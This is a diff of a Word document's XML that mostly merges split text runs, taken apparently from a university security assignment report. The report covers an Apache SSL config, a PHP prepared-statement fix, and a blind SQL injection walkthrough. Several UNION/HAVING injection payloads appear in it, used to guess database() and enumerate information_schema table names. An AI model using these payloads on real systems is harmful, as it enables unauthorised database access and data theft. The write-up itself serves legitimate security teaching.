-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> "/path/to/www.example.com.cert"</w:t>
+              <w:t xml:space="preserve">    SSLCertificateFile "/path/to/www.example.com.cert"</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -9863,27 +9538,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">    </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>SSLCertificateKeyFile</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> "/path/to/www.example.com.key"</w:t>
+              <w:t xml:space="preserve">    SSLCertificateKeyFile "/path/to/www.example.com.key"</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -9911,27 +9566,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>&lt;/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>VirtualHost</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>&gt;</w:t>
+              <w:t>&lt;/VirtualHost&gt;</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -10283,21 +9918,7 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">Note that the </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>apikey</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> needs to be replace</w:t>
+              <w:t>Note that the apikey needs to be replace</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -10332,7 +9953,6 @@
                 <w:szCs w:val="18"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="cm-variable"/>
@@ -10360,7 +9980,6 @@
               </w:rPr>
               <w:t>ajax</w:t>
             </w:r>
-            <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="message-body"/>
@@ -10408,67 +10027,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>"http://assignment-</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="cm-string"/>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>hermes.unimelb.life</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="cm-string"/>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="cm-string"/>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>api</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="cm-string"/>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="cm-string"/>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>store.php?name</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="cm-string"/>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>=%%"</w:t>
+              <w:t>"http://assignment-hermes.unimelb.life/api/store.php?name=%%"</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -10572,7 +10131,6 @@
                 <w:szCs w:val="18"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="cm-property"/>
@@ -10582,7 +10140,6 @@
               </w:rPr>
               <w:t>apikey</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="message-body"/>
@@ -10642,17 +10199,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>}</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="message-body"/>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>).</w:t>
+              <w:t>}).</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -10663,7 +10210,6 @@
               </w:rPr>
               <w:t>done</w:t>
             </w:r>
-            <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="message-body"/>
@@ -11430,43 +10976,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>$</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>stmt</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> = $con-&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>prepare(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>"SELECT * FROM Users WHERE username = ?");</w:t>
+              <w:t>$stmt = $con-&gt;prepare("SELECT * FROM Users WHERE username = ?");</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -11494,61 +11004,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>$</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>stmt</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>-&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>bind_</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>param</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>"s", $_GET["username"]);</w:t>
+              <w:t>$stmt-&gt;bind_param("s", $_GET["username"]);</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -11576,43 +11032,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>$</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>stmt</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>-&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>execute(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>);</w:t>
+              <w:t>$stmt-&gt;execute();</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -11640,43 +11060,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>$</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>stmt</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>-&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>close(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>);</w:t>
+              <w:t>$stmt-&gt;close();</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -12052,27 +11436,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>NULL,NULL</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>,NULL --+</w:t>
+              <w:t>' union select NULL,NULL,NULL --+</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -12210,27 +11574,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>NULL,NULL</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>,NULL having</w:t>
+              <w:t>' union select NULL,NULL,NULL having</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -12273,27 +11617,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>NULL,NULL</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>,NULL having substring(database(),1,2)=BINARY 'Se' limit 1 --+</w:t>
+              <w:t>' union select NULL,NULL,NULL having substring(database(),1,2)=BINARY 'Se' limit 1 --+</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -12311,21 +11635,7 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">In a), we use having clause to construct the statement such that the response will be “true” only if we have guessed the first character of </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>database(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>) correctly.</w:t>
+              <w:t>In a), we use having clause to construct the statement such that the response will be “true” only if we have guessed the first character of database() correctly.</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -12450,19 +11760,19 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>, which should be rare case</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>s</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> but if it happens, we will need to expand our charset</w:t>
+              <w:t xml:space="preserve">, which should be </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">a </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>rare case but if it happens, we will need to expand our charset</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -12482,13 +11792,19 @@
                 <w:rFonts w:hint="eastAsia"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>T</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>hen we have two options:</w:t>
+              <w:t>So</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> here </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>we have two options:</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -12525,13 +11841,43 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> use common sense here to tell whether we have got all the characters of what we are looking fo</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>r since the naming of the schema is likely to be human readable</w:t>
+              <w:t xml:space="preserve"> use </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">our </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>common sense to tell whether we have got all the characters of what we are looking fo</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">r since the naming of the schema is likely to be human </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>recognisable, e.g.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>,</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> combination of words</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -12556,7 +11902,19 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">We assume that we have got the correct guess and continue our exploitation. If we cannot proceed further, </w:t>
+              <w:t xml:space="preserve">We assume that we have got the </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>whole string</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> and continue our exploitation. If we cannot proceed further, </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -12640,20 +11998,12 @@
               </w:rPr>
               <w:t xml:space="preserve">the value of </w:t>
             </w:r>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:lastRenderedPageBreak/>
-              <w:t>database(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>),</w:t>
+              <w:t>database(),</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -12726,107 +12076,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>NULL,NULL</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">, </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>table_name</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> from </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>information_schema.columns</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> where </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>table_schema</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">='Secure' having </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>substr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>(table_name,1,7)=BINARY 'testing' limit 1 --+</w:t>
+              <w:t>' union select NULL,NULL, table_name from information_schema.columns where table_schema='Secure' having substr(table_name,1,7)=BINARY 'testing' limit 1 --+</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -12852,127 +12102,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>NULL,NULL</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">, </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>table_name</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> from </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>information_schema.columns</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> where </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>table_schema</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">='Secure' having </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>substr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">(table_name,1,9)=BINARY 'Trainings' and </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>table_name</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
